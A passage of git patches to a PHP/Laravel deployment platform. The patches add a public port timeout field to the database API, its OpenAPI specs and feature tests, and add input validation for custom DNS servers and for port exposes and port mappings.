+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database'];
$validator = customApiValidator($request->all(), [
'clickhouse_admin_user' => 'string',
'clickhouse_admin_password' => 'string',
@@ -1811,7 +1822,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
return response()->json(serializeApiResponse($payload))->setStatusCode(201);
} elseif ($type === NewDatabaseTypes::MYSQL) {
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
$validator = customApiValidator($request->all(), [
'mysql_root_password' => 'string',
'mysql_password' => 'string',
@@ -1870,7 +1881,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
return response()->json(serializeApiResponse($payload))->setStatusCode(201);
} elseif ($type === NewDatabaseTypes::REDIS) {
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'redis_password', 'redis_conf'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'redis_password', 'redis_conf'];
$validator = customApiValidator($request->all(), [
'redis_password' => 'string',
'redis_conf' => 'string',
@@ -1926,7 +1937,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
return response()->json(serializeApiResponse($payload))->setStatusCode(201);
} elseif ($type === NewDatabaseTypes::DRAGONFLY) {
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'dragonfly_password'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'dragonfly_password'];
$validator = customApiValidator($request->all(), [
'dragonfly_password' => 'string',
]);
@@ -1956,7 +1967,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
'uuid' => $database->uuid,
]))->setStatusCode(201);
} elseif ($type === NewDatabaseTypes::KEYDB) {
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'keydb_password', 'keydb_conf'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'keydb_password', 'keydb_conf'];
$validator = customApiValidator($request->all(), [
'keydb_password' => 'string',
'keydb_conf' => 'string',
@@ -2012,7 +2023,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
return response()->json(serializeApiResponse($payload))->setStatusCode(201);
} elseif ($type === NewDatabaseTypes::CLICKHOUSE) {
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'clickhouse_admin_user', 'clickhouse_admin_password'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'clickhouse_admin_user', 'clickhouse_admin_password'];
$validator = customApiValidator($request->all(), [
'clickhouse_admin_user' => 'string',
'clickhouse_admin_password' => 'string',
@@ -2048,7 +2059,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
return response()->json(serializeApiResponse($payload))->setStatusCode(201);
} elseif ($type === NewDatabaseTypes::MONGODB) {
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database'];
$validator = customApiValidator($request->all(), [
'mongo_conf' => 'string',
'mongo_initdb_root_username' => 'string',
diff --git a/openapi.json b/openapi.json
index aec5a2843..ee970c5c3 100644
--- a/openapi.json
+++ b/openapi.json
@@ -4544,6 +4544,10 @@
"type": "integer",
"description": "Public port of the database"
},
+ "public_port_timeout": {
+ "type": "integer",
+ "description": "Public port timeout in seconds (default: 3600)"
+ },
"limits_memory": {
"type": "string",
"description": "Memory limit of the database"
@@ -4989,6 +4993,10 @@
"type": "integer",
"description": "Public port of the database"
},
+ "public_port_timeout": {
+ "type": "integer",
+ "description": "Public port timeout in seconds (default: 3600)"
+ },
"limits_memory": {
"type": "string",
"description": "Memory limit of the database"
@@ -5117,6 +5125,10 @@
"type": "integer",
"description": "Public port of the database"
},
+ "public_port_timeout": {
+ "type": "integer",
+ "description": "Public port timeout in seconds (default: 3600)"
+ },
"limits_memory": {
"type": "string",
"description": "Memory limit of the database"
@@ -5241,6 +5253,10 @@
"type": "integer",
"description": "Public port of the database"
},
+ "public_port_timeout": {
+ "type": "integer",
+ "description": "Public port timeout in seconds (default: 3600)"
+ },
"limits_memory": {
"type": "string",
"description": "Memory limit of the database"
@@ -5369,6 +5385,10 @@
"type": "integer",
"description": "Public port of the database"
},
+ "public_port_timeout": {
+ "type": "integer",
+ "description": "Public port timeout in seconds (default: 3600)"
+ },
"limits_memory": {
"type": "string",
"description": "Memory limit of the database"
@@ -5497,6 +5517,10 @@
"type": "integer",
"description": "Public port of the database"
},
+ "public_port_timeout": {
+ "type": "integer",
+ "description": "Public port timeout in seconds (default: 3600)"
+ },
"limits_memory": {
"type": "string",
"description": "Memory limit of the database"
@@ -5637,6 +5661,10 @@
"type": "integer",
"description": "Public port of the database"
},
+ "public_port_timeout": {
+ "type": "integer",
+ "description": "Public port timeout in seconds (default: 3600)"
+ },
"limits_memory": {
"type": "string",
"description": "Memory limit of the database"
@@ -5777,6 +5805,10 @@
"type": "integer",
"description": "Public port of the database"
},
+ "public_port_timeout": {
+ "type": "integer",
+ "description": "Public port timeout in seconds (default: 3600)"
+ },
"limits_memory": {
"type": "string",
"description": "Memory limit of the database"
@@ -5905,6 +5937,10 @@
"type": "integer",
"description": "Public port of the database"
},
+ "public_port_timeout": {
+ "type": "integer",
+ "description": "Public port timeout in seconds (default: 3600)"
+ },
"limits_memory": {
"type": "string",
"description": "Memory limit of the database"
diff --git a/openapi.yaml b/openapi.yaml
index 93038ce80..80744d3d4 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -2873,6 +2873,9 @@ paths:
public_port:
type: integer
description: 'Public port of the database'
+ public_port_timeout:
+ type: integer
+ description: 'Public port timeout in seconds (default: 3600)'
limits_memory:
type: string
description: 'Memory limit of the database'
@@ -3189,6 +3192,9 @@ paths:
public_port:
type: integer
description: 'Public port of the database'
+ public_port_timeout:
+ type: integer
+ description: 'Public port timeout in seconds (default: 3600)'
limits_memory:
type: string
description: 'Memory limit of the database'
@@ -3281,6 +3287,9 @@ paths:
public_port:
type: integer
description: 'Public port of the database'
+ public_port_timeout:
+ type: integer
+ description: 'Public port timeout in seconds (default: 3600)'
limits_memory:
type: string
description: 'Memory limit of the database'
@@ -3370,6 +3379,9 @@ paths:
public_port:
type: integer
description: 'Public port of the database'
+ public_port_timeout:
+ type: integer
+ description: 'Public port timeout in seconds (default: 3600)'
limits_memory:
type: string
description: 'Memory limit of the database'
@@ -3462,6 +3474,9 @@ paths:
public_port:
type: integer
description: 'Public port of the database'
+ public_port_timeout:
+ type: integer
+ description: 'Public port timeout in seconds (default: 3600)'
limits_memory:
type: string
description: 'Memory limit of the database'
@@ -3554,6 +3569,9 @@ paths:
public_port:
type: integer
description: 'Public port of the database'
+ public_port_timeout:
+ type: integer
+ description: 'Public port timeout in seconds (default: 3600)'
limits_memory:
type: string
description: 'Memory limit of the database'
@@ -3655,6 +3673,9 @@ paths:
public_port:
type: integer
description: 'Public port of the database'
+ public_port_timeout:
+ type: integer
+ description: 'Public port timeout in seconds (default: 3600)'
limits_memory:
type: string
description: 'Memory limit of the database'
@@ -3756,6 +3777,9 @@ paths:
public_port:
type: integer
description: 'Public port of the database'
+ public_port_timeout:
+ type: integer
+ description: 'Public port timeout in seconds (default: 3600)'
limits_memory:
type: string
description: 'Memory limit of the database'
@@ -3848,6 +3872,9 @@ paths:
public_port:
type: integer
description: 'Public port of the database'
+ public_port_timeout:
+ type: integer
+ description: 'Public port timeout in seconds (default: 3600)'
limits_memory:
type: string
description: 'Memory limit of the database'
diff --git a/tests/Feature/DatabasePublicPortTimeoutApiTest.php b/tests/Feature/DatabasePublicPortTimeoutApiTest.php
new file mode 100644
index 000000000..6bbc6279f
--- /dev/null
+++ b/tests/Feature/DatabasePublicPortTimeoutApiTest.php
@@ -0,0 +1,147 @@
+ 0]);
+
+ $this->team = Team::factory()->create();
+ $this->user = User::factory()->create();
+ $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+ session(['currentTeam' => $this->team]);
+
+ $this->token = $this->user->createToken('test-token', ['*']);
+ $this->bearerToken = $this->token->plainTextToken;
+
+ $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+ $this->destination = StandaloneDocker::where('server_id', $this->server->id)->first();
+ $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+ $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+});
+
+describe('PATCH /api/v1/databases', function () {
+ test('updates public_port_timeout on a postgresql database', function () {
+ $database = StandalonePostgresql::create([
+ 'name' => 'test-postgres',
+ 'image' => 'postgres:15-alpine',
+ 'postgres_user' => 'postgres',
+ 'postgres_password' => 'password',
+ 'postgres_db' => 'postgres',
+ 'environment_id' => $this->environment->id,
+ 'destination_id' => $this->destination->id,
+ 'destination_type' => $this->destination->getMorphClass(),
+ ]);
+
+ $response = $this->withHeaders([
+ 'Authorization' => 'Bearer '.$this->bearerToken,
+ 'Content-Type' => 'application/json',
+ ])->patchJson("/api/v1/databases/{$database->uuid}", [
+ 'public_port_timeout' => 7200,
+ ]);
+
+ $response->assertStatus(200);
+ $database->refresh();
+ expect($database->public_port_timeout)->toBe(7200);
+ });
+
+ test('updates public_port_timeout on a redis database', function () {
+ $database = StandaloneRedis::create([
+ 'name' => 'test-redis',
+ 'image' => 'redis:7',
+ 'redis_password' => 'password',
+ 'environment_id' => $this->environment->id,
+ 'destination_id' => $this->destination->id,
+ 'destination_type' => $this->destination->getMorphClass(),
+ ]);
+
+ $response = $this->withHeaders([
+ 'Authorization' => 'Bearer '.$this->bearerToken,
+ 'Content-Type' => 'application/json',
+ ])->patchJson("/api/v1/databases/{$database->uuid}", [
+ 'public_port_timeout' => 1800,
+ ]);
+
+ $response->assertStatus(200);
+ $database->refresh();
+ expect($database->public_port_timeout)->toBe(1800);
+ });
+
+ test('rejects invalid public_port_timeout value', function () {
+ $database = StandalonePostgresql::create([
+ 'name' => 'test-postgres',
+ 'image' => 'postgres:15-alpine',
+ 'postgres_user' => 'postgres',
+ 'postgres_password' => 'password',
+ 'postgres_db' => 'postgres',
+ 'environment_id' => $this->environment->id,
+ 'destination_id' => $this->destination->id,
+ 'destination_type' => $this->destination->getMorphClass(),
+ ]);
+
+ $response = $this->withHeaders([
+ 'Authorization' => 'Bearer '.$this->bearerToken,
+ 'Content-Type' => 'application/json',
+ ])->patchJson("/api/v1/databases/{$database->uuid}", [
+ 'public_port_timeout' => 0,
+ ]);
+
+ $response->assertStatus(422);
+ });
+
+ test('accepts null public_port_timeout', function () {
+ $database = StandalonePostgresql::create([
+ 'name' => 'test-postgres',
+ 'image' => 'postgres:15-alpine',
+ 'postgres_user' => 'postgres',
+ 'postgres_password' => 'password',
+ 'postgres_db' => 'postgres',
+ 'environment_id' => $this->environment->id,
+ 'destination_id' => $this->destination->id,
+ 'destination_type' => $this->destination->getMorphClass(),
+ ]);
+
+ $response = $this->withHeaders([
+ 'Authorization' => 'Bearer '.$this->bearerToken,
+ 'Content-Type' => 'application/json',
+ ])->patchJson("/api/v1/databases/{$database->uuid}", [
+ 'public_port_timeout' => null,
+ ]);
+
+ $response->assertStatus(200);
+ $database->refresh();
+ expect($database->public_port_timeout)->toBeNull();
+ });
+});
+
+describe('POST /api/v1/databases/postgresql', function () {
+ test('creates postgresql database with public_port_timeout', function () {
+ $response = $this->withHeaders([
+ 'Authorization' => 'Bearer '.$this->bearerToken,
+ 'Content-Type' => 'application/json',
+ ])->postJson('/api/v1/databases/postgresql', [
+ 'server_uuid' => $this->server->uuid,
+ 'project_uuid' => $this->project->uuid,
+ 'environment_name' => $this->environment->name,
+ 'public_port_timeout' => 5400,
+ 'instant_deploy' => false,
+ ]);
+
+ $response->assertStatus(200);
+ $uuid = $response->json('uuid');
+ $database = StandalonePostgresql::whereUuid($uuid)->first();
+ expect($database)->not->toBeNull();
+ expect($database->public_port_timeout)->toBe(5400);
+ });
+});
From 407b6df7440d90f324a578ee0b0ebd10cae1da6a Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sat, 28 Mar 2026 22:30:17 +0530
Subject: [PATCH 104/168] fix(validation): add IP validation for custom DNS
servers input
---
app/Livewire/Settings/Advanced.php | 4 ++--
app/Rules/ValidDnsServers.php | 35 ++++++++++++++++++++++++++++++
2 files changed, 37 insertions(+), 2 deletions(-)
create mode 100644 app/Rules/ValidDnsServers.php
diff --git a/app/Livewire/Settings/Advanced.php b/app/Livewire/Settings/Advanced.php
index ad478273f..f4b57ae20 100644
--- a/app/Livewire/Settings/Advanced.php
+++ b/app/Livewire/Settings/Advanced.php
@@ -3,6 +3,7 @@
namespace App\Livewire\Settings;
use App\Models\InstanceSettings;
+use App\Rules\ValidDnsServers;
use App\Rules\ValidIpOrCidr;
use Livewire\Attributes\Validate;
use Livewire\Component;
@@ -20,7 +21,6 @@ class Advanced extends Component
#[Validate('boolean')]
public bool $is_dns_validation_enabled;
- #[Validate('nullable|string')]
public ?string $custom_dns_servers = null;
#[Validate('boolean')]
@@ -43,7 +43,7 @@ public function rules()
'is_registration_enabled' => 'boolean',
'do_not_track' => 'boolean',
'is_dns_validation_enabled' => 'boolean',
- 'custom_dns_servers' => 'nullable|string',
+ 'custom_dns_servers' => ['nullable', 'string', new ValidDnsServers],
'is_api_enabled' => 'boolean',
'allowed_ips' => ['nullable', 'string', new ValidIpOrCidr],
'is_sponsorship_popup_enabled' => 'boolean',
diff --git a/app/Rules/ValidDnsServers.php b/app/Rules/ValidDnsServers.php
new file mode 100644
index 000000000..e3bbd048f
--- /dev/null
+++ b/app/Rules/ValidDnsServers.php
@@ -0,0 +1,35 @@
+
Date: Sat, 28 Mar 2026 23:23:25 +0530
Subject: [PATCH 105/168] fix(validation): add input validation for port
exposes and port mappings fields
---
app/Livewire/Project/Application/General.php | 12 ++++++++--
.../Project/Database/Clickhouse/General.php | 6 ++++-
.../Project/Database/Dragonfly/General.php | 6 ++++-
.../Project/Database/Keydb/General.php | 6 ++++-
.../Project/Database/Mariadb/General.php | 6 ++++-
.../Project/Database/Mongodb/General.php | 6 ++++-
.../Project/Database/Mysql/General.php | 6 ++++-
.../Project/Database/Postgresql/General.php | 6 ++++-
.../Project/Database/Redis/General.php | 6 ++++-
app/Support/ValidationPatterns.php | 24 +++++++++++++++++++
10 files changed, 74 insertions(+), 10 deletions(-)
diff --git a/app/Livewire/Project/Application/General.php b/app/Livewire/Project/Application/General.php
index 5c186af70..3e78c1732 100644
--- a/app/Livewire/Project/Application/General.php
+++ b/app/Livewire/Project/Application/General.php
@@ -153,8 +153,8 @@ protected function rules(): array
'staticImage' => 'required',
'baseDirectory' => array_merge(['required'], array_slice(ValidationPatterns::directoryPathRules(), 1)),
'publishDirectory' => ValidationPatterns::directoryPathRules(),
- 'portsExposes' => 'required',
- 'portsMappings' => 'nullable',
+ 'portsExposes' => ['required', 'string', 'regex:/^(\d+)(,\d+)*$/'],
+ 'portsMappings' => ValidationPatterns::portMappingRules(),
'customNetworkAliases' => 'nullable',
'dockerfile' => 'nullable',
'dockerRegistryImageName' => 'nullable',
@@ -209,6 +209,8 @@ protected function messages(): array
'staticImage.required' => 'The Static Image field is required.',
'baseDirectory.required' => 'The Base Directory field is required.',
'portsExposes.required' => 'The Exposed Ports field is required.',
+ 'portsExposes.regex' => 'Ports exposes must be a comma-separated list of port numbers (e.g. 3000,3001).',
+ ...ValidationPatterns::portMappingMessages(),
'isStatic.required' => 'The Static setting is required.',
'isStatic.boolean' => 'The Static setting must be true or false.',
'isSpa.required' => 'The SPA setting is required.',
@@ -752,6 +754,12 @@ public function submit($showToaster = true)
$this->authorize('update', $this->application);
$this->resetErrorBag();
+
+ $this->portsExposes = str($this->portsExposes)->replace(' ', '')->trim()->toString();
+ if ($this->portsMappings) {
+ $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+ }
+
$this->validate();
$oldPortsExposes = $this->application->ports_exposes;
diff --git a/app/Livewire/Project/Database/Clickhouse/General.php b/app/Livewire/Project/Database/Clickhouse/General.php
index 9de75c1c5..0913ca797 100644
--- a/app/Livewire/Project/Database/Clickhouse/General.php
+++ b/app/Livewire/Project/Database/Clickhouse/General.php
@@ -79,7 +79,7 @@ protected function rules(): array
'clickhouseAdminUser' => 'required|string',
'clickhouseAdminPassword' => 'required|string',
'image' => 'required|string',
- 'portsMappings' => 'nullable|string',
+ 'portsMappings' => ValidationPatterns::portMappingRules(),
'isPublic' => 'nullable|boolean',
'publicPort' => 'nullable|integer',
'publicPortTimeout' => 'nullable|integer|min:1',
@@ -94,6 +94,7 @@ protected function messages(): array
{
return array_merge(
ValidationPatterns::combinedMessages(),
+ ValidationPatterns::portMappingMessages(),
[
'clickhouseAdminUser.required' => 'The Admin User field is required.',
'clickhouseAdminUser.string' => 'The Admin User must be a string.',
@@ -207,6 +208,9 @@ public function submit()
try {
$this->authorize('update', $this->database);
+ if ($this->portsMappings) {
+ $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+ }
if (str($this->publicPort)->isEmpty()) {
$this->publicPort = null;
}
diff --git a/app/Livewire/Project/Database/Dragonfly/General.php b/app/Livewire/Project/Database/Dragonfly/General.php
index d35e57a9d..23503bd98 100644
--- a/app/Livewire/Project/Database/Dragonfly/General.php
+++ b/app/Livewire/Project/Database/Dragonfly/General.php
@@ -90,7 +90,7 @@ protected function rules(): array
'description' => ValidationPatterns::descriptionRules(),
'dragonflyPassword' => 'required|string',
'image' => 'required|string',
- 'portsMappings' => 'nullable|string',
+ 'portsMappings' => ValidationPatterns::portMappingRules(),
'isPublic' => 'nullable|boolean',
'publicPort' => 'nullable|integer',
'publicPortTimeout' => 'nullable|integer|min:1',
@@ -106,6 +106,7 @@ protected function messages(): array
{
return array_merge(
ValidationPatterns::combinedMessages(),
+ ValidationPatterns::portMappingMessages(),
[
'dragonflyPassword.required' => 'The Dragonfly Password field is required.',
'dragonflyPassword.string' => 'The Dragonfly Password must be a string.',
@@ -217,6 +218,9 @@ public function submit()
try {
$this->authorize('update', $this->database);
+ if ($this->portsMappings) {
+ $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+ }
if (str($this->publicPort)->isEmpty()) {
$this->publicPort = null;
}
diff --git a/app/Livewire/Project/Database/Keydb/General.php b/app/Livewire/Project/Database/Keydb/General.php
index adb4ccb5f..ff9dc19ad 100644
--- a/app/Livewire/Project/Database/Keydb/General.php
+++ b/app/Livewire/Project/Database/Keydb/General.php
@@ -93,7 +93,7 @@ protected function rules(): array
'keydbConf' => 'nullable|string',
'keydbPassword' => 'required|string',
'image' => 'required|string',
- 'portsMappings' => 'nullable|string',
+ 'portsMappings' => ValidationPatterns::portMappingRules(),
'isPublic' => 'nullable|boolean',
'publicPort' => 'nullable|integer',
'publicPortTimeout' => 'nullable|integer|min:1',
@@ -111,6 +111,7 @@ protected function messages(): array
{
return array_merge(
ValidationPatterns::combinedMessages(),
+ ValidationPatterns::portMappingMessages(),
[
'keydbPassword.required' => 'The KeyDB Password field is required.',
'keydbPassword.string' => 'The KeyDB Password must be a string.',
@@ -224,6 +225,9 @@ public function submit()
try {
$this->authorize('manageEnvironment', $this->database);
+ if ($this->portsMappings) {
+ $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+ }
if (str($this->publicPort)->isEmpty()) {
$this->publicPort = null;
}
diff --git a/app/Livewire/Project/Database/Mariadb/General.php b/app/Livewire/Project/Database/Mariadb/General.php
index 14240c82d..a9ac47b97 100644
--- a/app/Livewire/Project/Database/Mariadb/General.php
+++ b/app/Livewire/Project/Database/Mariadb/General.php
@@ -78,7 +78,7 @@ protected function rules(): array
'mariadbDatabase' => 'required',
'mariadbConf' => 'nullable',
'image' => 'required',
- 'portsMappings' => 'nullable',
+ 'portsMappings' => ValidationPatterns::portMappingRules(),
'isPublic' => 'nullable|boolean',
'publicPort' => 'nullable|integer',
'publicPortTimeout' => 'nullable|integer|min:1',
@@ -92,6 +92,7 @@ protected function messages(): array
{
return array_merge(
ValidationPatterns::combinedMessages(),
+ ValidationPatterns::portMappingMessages(),
[
'name.required' => 'The Name field is required.',
'mariadbRootPassword.required' => 'The Root Password field is required.',
@@ -213,6 +214,9 @@ public function submit()
try {
$this->authorize('update', $this->database);
+ if ($this->portsMappings) {
+ $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+ }
if (str($this->publicPort)->isEmpty()) {
$this->publicPort = null;
}
diff --git a/app/Livewire/Project/Database/Mongodb/General.php b/app/Livewire/Project/Database/Mongodb/General.php
index 11419ec71..2b6538edf 100644
--- a/app/Livewire/Project/Database/Mongodb/General.php
+++ b/app/Livewire/Project/Database/Mongodb/General.php
@@ -77,7 +77,7 @@ protected function rules(): array
'mongoInitdbRootPassword' => 'required',
'mongoInitdbDatabase' => 'required',
'image' => 'required',
- 'portsMappings' => 'nullable',
+ 'portsMappings' => ValidationPatterns::portMappingRules(),
'isPublic' => 'nullable|boolean',
'publicPort' => 'nullable|integer',
'publicPortTimeout' => 'nullable|integer|min:1',
@@ -92,6 +92,7 @@ protected function messages(): array
{
return array_merge(
ValidationPatterns::combinedMessages(),
+ ValidationPatterns::portMappingMessages(),
[
'name.required' => 'The Name field is required.',
'mongoInitdbRootUsername.required' => 'The Root Username field is required.',
@@ -213,6 +214,9 @@ public function submit()
try {
$this->authorize('update', $this->database);
+ if ($this->portsMappings) {
+ $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+ }
if (str($this->publicPort)->isEmpty()) {
$this->publicPort = null;
}
diff --git a/app/Livewire/Project/Database/Mysql/General.php b/app/Livewire/Project/Database/Mysql/General.php
index 4f0f5eb19..f3c554522 100644
--- a/app/Livewire/Project/Database/Mysql/General.php
+++ b/app/Livewire/Project/Database/Mysql/General.php
@@ -80,7 +80,7 @@ protected function rules(): array
'mysqlDatabase' => 'required',
'mysqlConf' => 'nullable',
'image' => 'required',
- 'portsMappings' => 'nullable',
+ 'portsMappings' => ValidationPatterns::portMappingRules(),
'isPublic' => 'nullable|boolean',
'publicPort' => 'nullable|integer',
'publicPortTimeout' => 'nullable|integer|min:1',
@@ -95,6 +95,7 @@ protected function messages(): array
{
return array_merge(
ValidationPatterns::combinedMessages(),
+ ValidationPatterns::portMappingMessages(),
[
'name.required' => 'The Name field is required.',
'mysqlRootPassword.required' => 'The Root Password field is required.',
@@ -220,6 +221,9 @@ public function submit()
try {
$this->authorize('update', $this->database);
+ if ($this->portsMappings) {
+ $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+ }
if (str($this->publicPort)->isEmpty()) {
$this->publicPort = null;
}
diff --git a/app/Livewire/Project/Database/Postgresql/General.php b/app/Livewire/Project/Database/Postgresql/General.php
index 4e044672b..7a4ff057e 100644
--- a/app/Livewire/Project/Database/Postgresql/General.php
+++ b/app/Livewire/Project/Database/Postgresql/General.php
@@ -92,7 +92,7 @@ protected function rules(): array
'postgresConf' => 'nullable',
'initScripts' => 'nullable',
'image' => 'required',
- 'portsMappings' => 'nullable',
+ 'portsMappings' => ValidationPatterns::portMappingRules(),
'isPublic' => 'nullable|boolean',
'publicPort' => 'nullable|integer',
'publicPortTimeout' => 'nullable|integer|min:1',
@@ -107,6 +107,7 @@ protected function messages(): array
{
return array_merge(
ValidationPatterns::combinedMessages(),
+ ValidationPatterns::portMappingMessages(),
[
'name.required' => 'The Name field is required.',
'postgresUser.required' => 'The Postgres User field is required.',
@@ -456,6 +457,9 @@ public function submit()
try {
$this->authorize('update', $this->database);
+ if ($this->portsMappings) {
+ $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+ }
if (str($this->publicPort)->isEmpty()) {
$this->publicPort = null;
}
diff --git a/app/Livewire/Project/Database/Redis/General.php b/app/Livewire/Project/Database/Redis/General.php
index ebe2f3ba0..a1a22ab8b 100644
--- a/app/Livewire/Project/Database/Redis/General.php
+++ b/app/Livewire/Project/Database/Redis/General.php
@@ -73,7 +73,7 @@ protected function rules(): array
'description' => ValidationPatterns::descriptionRules(),
'redisConf' => 'nullable',
'image' => 'required',
- 'portsMappings' => 'nullable',
+ 'portsMappings' => ValidationPatterns::portMappingRules(),
'isPublic' => 'nullable|boolean',
'publicPort' => 'nullable|integer',
'publicPortTimeout' => 'nullable|integer|min:1',
@@ -89,6 +89,7 @@ protected function messages(): array
{
return array_merge(
ValidationPatterns::combinedMessages(),
+ ValidationPatterns::portMappingMessages(),
[
'name.required' => 'The Name field is required.',
'image.required' => 'The Docker Image field is required.',
@@ -201,6 +202,9 @@ public function submit()
try {
$this->authorize('manageEnvironment', $this->database);
+ if ($this->portsMappings) {
+ $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+ }
$this->syncData(true);
if (version_compare($this->redisVersion, '6.0', '>=')) {
diff --git a/app/Support/ValidationPatterns.php b/app/Support/ValidationPatterns.php
index 7084b4cc2..5d53076ea 100644
--- a/app/Support/ValidationPatterns.php
+++ b/app/Support/ValidationPatterns.php
@@ -194,6 +194,12 @@ public static function volumeNameMessages(string $field = 'name'): array
];
}
+ /**
+ * Pattern for port mappings (e.g. 3000:3000, 8080:80, 8000-8010:8000-8010)
+ * Each entry requires host:container format, where each side can be a number or a range (number-number)
+ */
+ public const PORT_MAPPINGS_PATTERN = '/^(\d+(-\d+)?:\d+(-\d+)?)(,\d+(-\d+)?:\d+(-\d+)?)*$/';
+
/**
* Get validation rules for container name fields
*/
@@ -202,6 +208,24 @@ public static function containerNameRules(int $maxLength = 255): array
return ['string', 'max:'.$maxLength, 'regex:'.self::CONTAINER_NAME_PATTERN];
}
+ /**
+ * Get validation rules for port mapping fields
+ */
+ public static function portMappingRules(): array
+ {
+ return ['nullable', 'string', 'regex:'.self::PORT_MAPPINGS_PATTERN];
+ }
+
+ /**
+ * Get validation messages for port mapping fields
+ */
+ public static function portMappingMessages(string $field = 'portsMappings'): array
+ {
+ return [
